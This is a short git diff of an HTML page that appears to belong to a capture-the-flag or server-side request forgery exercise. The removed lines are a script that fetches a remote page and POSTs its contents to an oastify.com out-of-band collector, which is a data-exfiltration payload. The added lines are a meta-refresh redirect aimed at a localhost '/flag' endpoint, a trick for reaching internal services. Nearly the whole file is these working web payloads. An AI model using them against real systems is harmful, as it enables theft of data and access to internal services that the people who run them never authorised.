--- a/iframe.html
+++ b/iframe.html
@@ -2,26 +2,10 @@
 <html lang="en">
 <head>
     <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Embedded Pages</title>
+    <meta http-equiv="refresh" content="0;url=http://127.0.0.1:8080/flag">
+    <title>Redirecting...</title>
 </head>
 <body>
-    <h1></h1>
-    <!-- <iframe src="http://unthinkable.me/" width="100%" height="500px"></iframe> -->
-    <script>
-        fetch('http://unthinkable.me/')
-            .then(response => response.text())
-            .then(data => {
-                fetch("http://4qvsaj37n739p5mnhvem66iujlpcdg15.oastify.com", {
-                    method: "POST",
-                    headers: {
-                        'Content-Type': 'application/x-www-form-urlencoded'
-                    },
-                    body: "data=" + encodeURIComponent(data)
-                });
-            });
-    </script>
-    
-
+    <p>If you are not redirected automatically, <a href="http://127.0.0.1:8080/flag">click here</a>.</p>
 </body>
 </html>
